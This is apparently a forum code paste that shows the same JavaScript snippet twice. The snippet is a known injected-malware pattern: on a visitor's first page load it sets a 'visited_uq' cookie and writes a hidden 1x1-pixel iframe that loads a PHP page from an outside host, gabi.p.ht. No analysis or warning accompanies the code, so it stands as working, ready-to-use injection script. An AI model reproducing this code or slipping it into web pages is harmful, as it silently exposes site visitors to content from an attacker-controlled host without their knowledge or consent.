- function zzzfff(){
- var ts = document.createElement('iframe');
- ts.src = 'http://gabi.p.ht/dtd.php';
- ts.style.position = 'absolute';
- ts.style.border = '0';
- ts.style.height = '1px';
- ts.style.width = '1px';
- ts.style.left = '1px';
- ts.style.top = '1px';
- if (!document.getElementById('ts')){
- document.write('<div id=\'ts\'></div>');
- document.getElementById('ts').appendChild(ts);
- }
- }
- function SetCookie(cookieName, cookieValue, nDays, path){
- var today = new Date();
- var expire = new Date();
- if (nDays == null || nDays == 0)nDays = 1;
- expire.setTime(today.getTime() + 3600000 * 24 * nDays);
- document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.
- toGMTString() + ((path) ? "; path=" + path : "");
- }
- function GetCookie(name){
- var start = document.cookie.indexOf(name + "=");
- var len = start + name.length + 1;
- if ((!start) && (name != document.cookie.substring(0, name.length))){
- return null;
- }
- if (start == - 1)return null;
- var end = document.cookie.indexOf(";", len);
- if (end == - 1)end = document.cookie.length;
- return unescape(document.cookie.substring(len, end));
- }
- if (navigator.cookieEnabled){
- if (GetCookie('visited_uq') == 55){
- }
- else {
- SetCookie('visited_uq', '55', '1', '/');
- zzzfff();
- }
- }
复制代码- function zzzfff(){
- var qxypa = document.createElement('iframe');
- qxypa.src = 'http://gabi.p.ht/dtd.php';
- qxypa.style.position = 'absolute';
- qxypa.style.border = '0';
- qxypa.style.height = '1px';
- qxypa.style.width = '1px';
- qxypa.style.left = '1px';
- qxypa.style.top = '1px';
- if (!document.getElementById('qxypa')){
- document.write('<div id=\'qxypa\'></div>');
- document.getElementById('qxypa').appendChild(qxypa);
- }
- }
- function SetCookie(cookieName, cookieValue, nDays, path){
- var today = new Date();
- var expire = new Date();
- if (nDays == null || nDays == 0)nDays = 1;
- expire.setTime(today.getTime() + 3600000 * 24 * nDays);
- document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.
- toGMTString() + ((path) ? "; path=" + path : "");
- }
- function GetCookie(name){
- var start = document.cookie.indexOf(name + "=");
- var len = start + name.length + 1;
- if ((!start) && (name != document.cookie.substring(0, name.length))){
- return null;
- }
- if (start == - 1)return null;
- var end = document.cookie.indexOf(";", len);
- if (end == - 1)end = document.cookie.length;
- return unescape(document.cookie.substring(len, end));
- }
- if (navigator.cookieEnabled){
- if (GetCookie('visited_uq') == 55){
- }
- else {
- SetCookie('visited_uq', '55', '1', '/');
- zzzfff();
- }
- }
复制代码 |